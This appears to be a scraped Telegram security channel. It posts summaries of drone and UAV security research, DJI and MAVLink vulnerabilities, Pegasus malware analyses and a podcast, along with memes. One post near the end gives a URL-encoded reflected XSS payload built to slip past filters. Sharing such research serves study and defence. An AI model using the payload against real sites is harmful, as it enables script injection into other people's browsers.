Source Byte – Telegram
Source Byte
7.77K subscribers
847 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
👍2
Security analysis of drones systems.pdf
4.4 MB
🔥Security analysis of drones systems: Attacks, limitations, and recommendations

UAV and drones use led to the rise of many security, safety and privacy issues, which were manifested through various cyber attacks, threats and challenges, listed and explained in this paper. Also, we presented a holistic view of the drones/UAVs domains and provided detailed explanation and classification of their use in various domains and for different purposes, in addition to the different lethal/non-lethal security solutions as part of drones/UAVs countermeasures.

Moreover, successful experiments to detect, intercept and hijack a drone through either de-authentication or jamming were highlighted, based on realistic scenarios that follow the traditional hacking cycle and hence, confirming the ease with which drones could be intercepted, especially in terms of UAV communication channels.
👍3🔥3
Burp Suite for Pentester

Lets go, Burpy
3🥰1
😁
😁7
🔥3
EVO II User Manual ru 0520.ru.ru.pdf
3.6 MB
4💩1
the family photo of Zelesanki and his father
😁6🖕4👍1
🛸DJI Drone Vulnerability

In a recent investigation, Check Point Research discovered a vulnerability that, if exploited, would grant an attacker access to a user’s DJI account without the user being aware of it. CheckPoint research below explains how we were able to gain access to sensitive DJI drone flight information, as well as sensitive user data, across all three DJI platforms of Website, Mobile App and FlightHub.
2021_USA21_SBX1_XIL1_01_UAV_Security_Research_Series_Episode_5_MAVLink.pdf
2.2 MB
🛸Drone Security Research - Exploring MAVLink

Many commercial and recreational UAS systems use MAVLink to communicate instructions and data between the Ground Control Station and the drone. We explore the security aspects of this protocol and what it means for assessing threats, risks and mitigations for drone operators.
🔥2
مهمان این هفته پادکست دارکنِت دایاریز خانم مَدی استون

کارشناس امنیت و از اعضای پروژه صفرشرکت گوکل بود. دراین اپیزود
موضوعات جالبی مثل نحوه شناسایی بدافزارهای اندروید، چگونگی مهندسی معکوس بدافزار های موجود و کشف آسیب پذیریهای روز صفر رو با مدی به بحث وگفتگو گذاشت. یکی از نکات جالب گفتگو مرور اجمالی نحوه کارکرد سیستم Google Play Protect بود که اخیرا نرم افزار روبیکا رو بدافزار تشخیص داد.

https://darknetdiaries.com/episode/127/
👍3
اگر علاقه مند به حوزه آنالیز #بدافرار یا همون Malware Analysis هستید، توصیه میکنم این سه گزارش فنی با جزییات بسیار ارزشمند درخصوص بدافزار #پگاسوس Pegasus رو حتما چک کنید.

بخش اول
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1/
بخش دوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/
بخش سوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/
4
Reflected xss :)
Payload :
%27%2B%3C%2FScripT%3E%3CScRIpT%3Eprompt%28document.domain%29%3C%2FscRIpT%3E%2B%27
1
He is man of culture 😂
🤣6🤮1
A summary of UAV operations conducted by Russian troops:

#Drone
🔥2